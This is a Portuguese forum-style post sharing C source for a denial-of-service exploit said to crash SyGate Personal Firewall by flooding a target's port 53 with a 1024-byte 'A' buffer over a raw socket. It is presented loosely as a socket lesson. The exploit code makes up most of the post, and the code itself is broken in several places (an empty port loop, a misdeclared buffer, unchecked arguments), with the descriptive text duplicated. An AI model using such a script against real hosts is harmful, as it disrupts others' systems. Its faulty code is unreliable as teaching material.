Derrubando SyGate Profissional Firewall !
Esse exploit eu fiz há um bom tempo, nao lembro em que versao ele estava... !
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !
Falowsss !
[]s
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !
Falowsss !
[]s
Descrição
Esse exploit eu fiz há um bom tempo, nao lembro em que versao ele estava... !
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !
Falowsss !
[]s
E nem sei se está funcionando perfeitamente, hehe... !
Mas mais vale o propósito educacional, uma bela aula sobre sockets em C !
Falowsss !
[]s
/*
Derrubando SyGate Personal Firewall
by vir0se - virose@bol.com.br
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#define A 0x41
#define PORTA_INICIAL 1
#define PORTA_FINAL 7000
int main (int argc, char **argv)
{
int SockFD, addrlen, bsent, i, porta_inicial, porta_final, portas;
struct sockaddr_in UDPSock;
char *buf[1024];
printf("\n\n\033[1;32m DERRUBANDO SYGATE PERSONAL FIREWALL \n");
printf("\033[1;33m BY vir0se.....\033[9;0m\n\n");
if(argc==1){
printf("\033[1;34mUsando: %s [servidor] [porta inicial] [porta final]\033[9;0m\n\n\n",argv[0]);
exit(1);
}
if (argc > 1){
porta_inicial = PORTA_INICIAL;
porta_final = PORTA_FINAL;
}
if (argc > 2)
{
porta_inicial = atoi (argv[2]);
porta_final = atoi (argv[3]);
}
for (portas = porta_inicial; portas < porta_final; portas++);
SockFD=socket(AF_INET, SOCK_RAW, 3);
UDPSock.sin_family=AF_INET;
UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
UDPSock.sin_port=htons(53);
bzero(&(UDPSock.sin_zero), 8);
if (connect(SockFD,(struct sockaddr *)&UDPSock, sizeof(UDPSock)) < 0){
fprintf(stderr,"Connect error\n");
exit(-1);
}
bzero(buf,sizeof(buf));
printf ("\n\n\033[1;31m ENVIANDO BUFFER OVERFLOW... SEGURA ESSA %s ...\033[9;0m\n\n\n", argv[1]);
for(i=0; i < 1024; i++)
buf[i] = (char *) A;
buf[1024 -1] = '\0';
if(bsent=sendto(SockFD,buf,strlen(buf),0,(struct sockaddr *)&UDPSock, sizeof(struct sockaddr_in)) < 0){
printf("erro write()\n");
close(SockFD);
exit(-1);
}
printf("DADOS ENVIADOS COM SUUUUUUUUUUU... CESSOOO... .\nDados Enviados: %i\n\n\n",bsent);
close(SockFD);
return 0;
}
1) Nome do Firewall: Nao é SyGate Profissional Firewall e sim SyGate Personal Firewall !
Esse é um exploit para a versao gratuita do firewall . É muito provavel que já foi corrigida a falha !
2) Código-fonte: Se voces forem testar o script, é melhor que façam o download dele invés de
copiar e colar, na seção CODIGO FONTE, pois sem querer apareceu diversos erros... !
Falows !